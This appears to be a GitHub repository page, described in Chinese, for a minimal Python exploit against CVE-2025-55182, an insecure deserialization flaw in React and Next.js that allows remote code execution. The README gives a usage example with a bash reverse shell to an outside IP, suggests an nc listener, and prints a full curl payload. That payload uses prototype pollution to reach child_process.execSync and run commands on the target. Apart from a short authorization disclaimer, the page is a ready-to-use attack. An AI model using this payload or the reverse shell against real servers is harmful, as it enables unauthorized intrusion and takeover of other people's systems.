PedroPLCode/CVE-2025-55182_react2shell_exploit.py

GitHub: PedroPLCode/CVE-2025-55182_react2shell_exploit.py

针对 React/Next.js 不安全反序列化漏洞(CVE-2025-55182)的极简 RCE 利用脚本,通过构造恶意 POST 请求在目标服务器上执行任意命令。

Stars: 0 | Forks: 0

## CVE-2025-55182 不安全的反序列化 - RCE ``` React 19.0.0, 19.1.0, 19.1.1, 19.2.0 / Next.js 15.x (with App Router), 16.0.0 - 16.0.6 ``` 这是一个针对 React2Shell 漏洞 (CVE-2025-55182) 的极简漏洞利用脚本。 它会构造并发送一个精心制作的 multipart/form-data POST 请求 到存在漏洞的 React 应用程序,从而实现远程代码执行。 ``` # 用法: python3 react2shell_exploit.py # 示例: python3 react2shell_exploit.py http://10.87.161.17:8080 'bash -i >& /dev/tcp/10.111.0.193/4444 0>&1' OR 'ls -la >&2 && exit 1' ``` 你提供的命令将在目标服务器上执行。 ``` For reverse shells, ensure you have a listener set up on your local machine before executing the exploit. eg. `nc -lvnp 4444` ``` 免责声明:请仅在你拥有或获得明确授权测试的系统上使用此脚本。 未经授权 访问计算机系统是非法且不道德的。 ``` # data format 0:{"id":1,"data":"value"} 1:{"ref":"$@0"} ``` ``` # rce whoami curl -X POST http://10.87.161.17:8080 -H "Next-Action: x" -H "Content-Type: multipart/form-data; boundary=----X" --data-binary $'------X\r\nContent-Disposition: form-data; name="0"\r\n\r\n{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\\"then\\":\\"$B1337\\"}","_response": {"_prefix":"process.mainModule.require(\'child_process\').execSync(\'whoami >&2 && exit 1\');","_formData": {"get":"$1:constructor:constructor"}}}\r\n------X\r\nContent-Disposition: form-data; name="1"\r\n\r\n"$@0"\r\n------X--\r\n' ```
标签:Go语言工具, Python, RCE, 威胁模拟, 安全, 无后门, 超时处理, 逆向工具